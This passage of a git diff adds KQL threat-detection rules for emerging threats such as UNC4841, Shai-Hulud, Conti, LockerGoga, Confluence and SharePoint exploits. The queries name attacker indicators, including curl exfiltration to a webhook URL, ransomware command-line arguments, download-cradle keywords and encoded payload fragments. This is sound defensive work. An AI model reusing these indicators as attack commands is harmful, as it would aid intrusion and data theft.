"/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql new file mode 100644 index 00000000..79424796 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql @@ -0,0 +1,10 @@ +// Title: UNC4841 - Email Exfiltration File Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents +| where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql new file mode 100644 index 00000000..fc00805c --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql @@ -0,0 +1,12 @@ +// Title: UNC4841 - Potential SEASPY Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: critical +// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql new file mode 100644 index 00000000..7e281dd2 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql @@ -0,0 +1,13 @@ +// Title: Ursnif Redirection Of Discovery Commands +// Author: @kostastsale +// Date: 2023-07-16 +// Level: high +// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql new file mode 100644 index 00000000..9c8bac3d --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql @@ -0,0 +1,12 @@ +// Title: ZxShell Malware +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2017-07-20 +// Level: critical +// Description: Detects a ZxShell start by the called and well-known function name +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql new file mode 100644 index 00000000..31e5a823 --- /dev/null +++ b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql @@ -0,0 +1,12 @@ +// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: high +// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql new file mode 100644 index 00000000..682dd2a9 --- /dev/null +++ b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql @@ -0,0 +1,12 @@ +// Title: FunkLocker Ransomware File Creation +// Author: Saiprashanth Pulisetti ( @Prashanthblogs) +// Date: 2025-08-08 +// Level: high +// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ".funksec" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql new file mode 100644 index 00000000..bf5f2f9e --- /dev/null +++ b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: LockerGoga Ransomware Activity +// Author: Vasiliy Burov, oscd.community +// Date: 2020-10-18 +// Level: critical +// Description: Detects LockerGoga ransomware activity via specific command line. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-i SM-tgytutrc -s" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql new file mode 100644 index 00000000..7e08e896 --- /dev/null +++ b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Conti Ransomware Activity +// Author: frack113 +// Date: 2021-10-12 +// Level: critical +// Description: Detects a specific command used by the Conti ransomware group +// MITRE Tactic: Impact +// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql new file mode 100644 index 00000000..df55105f --- /dev/null +++ b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Dtrack RAT Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-30 +// Level: critical +// Description: Detects potential Dtrack RAT activity via specific process patterns +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql new file mode 100644 index 00000000..19067c7b --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql @@ -0,0 +1,12 @@ +// Title: Apache Spark Shell Command Injection - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-20 +// Level: high +// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql new file mode 100644 index 00000000..fa8662cb --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql @@ -0,0 +1,10 @@ +// Title: Atlassian Confluence CVE-2022-26134 +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql new file mode 100644 index 00000000..26f130b7 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql @@ -0,0 +1,12 @@ +// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791) +// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: high +// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791. +An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791 + +DeviceProcessEvents +| where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql new file mode 100644 index 00000000..422b2798 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-31979 CVE-2021-33771 Exploits +// Author: Sittikorn S, frack113 +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql new file mode 100644 index 00000000..b13dcffa --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +// Author: Sittikorn S +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql new file mode 100644 index 00000000..40f07b02 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql @@ -0,0 +1,13 @@ +// Title: CVE-2024-50623 Exploitation Attempt - Cleo +// Author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson +// Date: 2024-12-09 +// Level: high +// Description: Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, cve.2024-50623, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand" or ProcessCommandLine contains ".Download") and FolderPath endswith "\\cmd.exe" and (InitiatingProcessCommandLine contains "Harmony" or InitiatingProcessCommandLine contains "lexicom" or InitiatingProcessCommandLine contains "VersaLex" or InitiatingProcessCommandLine contains "VLTrader") and InitiatingProcessFolderPath endswith "\\javaw.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql new file mode 100644 index 00000000..c1d338a1 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql @@ -0,0 +1,12 @@ +// Title: DNS RCE CVE-2020-1350 +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-15 +// Level: critical +// Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2020-1350, detection.emerging-threats +// False Positives: +// - Unknown but benign sub processes of the Windows DNS service dns.exe + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\System32\\dns.exe" and (not((FolderPath endswith "\\System32\\werfault.exe" or FolderPath endswith "\\System32\\conhost.exe" or FolderPath endswith "\\System32\\dnscmd.exe" or FolderPath endswith "\\System32\\dns.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql new file mode 100644 index 00000000..7231aecb --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql @@ -0,0 +1,10 @@ +// Title: Exploited CVE-2020-10189 Zoho ManageEngine +// Author: Florian Roth (Nextron Systems) +// Date: 2020-03-25 +// Level: high +// Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.t1059.003, attack.s0190, cve.2020-10189, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "DesktopCentral_Server\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql new file mode 100644 index 00000000..41e21aea --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-09-08 +// Level: high +// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql new file mode 100644 index 00000000..aacf7839 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql @@ -0,0 +1,13 @@ +// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon +// Author: @kostastsale +// Date: 2022-01-14 +// Level: high +// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql new file mode 100644 index 00000000..7038bf52 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql @@ -0,0 +1,12 @@ +// Title: Potential CVE-2022-26809 Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-13 +// Level: high +// Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1569.002, cve.2022-26809, detection.emerging-threats +// False Positives: +// - Some cases in which the service spawned a werfault.exe process + +DeviceProcessEvents +| where InitiatingProcessCommandLine contains "-k RPCSS" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql new file mode 100644 index 00000000..90f0939d --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql @@ -0,0 +1,10 @@ +// Title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali +// Date: 2023-01-21 +// Level: high +// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql new file mode 100644 index 00000000..e660a078 --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql @@ -0,0 +1,14 @@ +// Title: Potential Exploitation of GoAnywhere MFT Vulnerability +// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-07 +// Level: high +// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035. +This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035 +// False Positives: +// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment. + +DeviceProcessEvents +| where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql new file mode 100644 index 00000000..cb67a2eb --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql @@ -0,0 +1,12 @@ +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: critical +// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. +CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceFileEvents +| where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql new file mode 100644 index 00000000..7be0e5cc --- /dev/null +++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql @@ -0,0 +1,12 @@ +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: high +// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. +CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. + +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceProcessEvents +| where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains 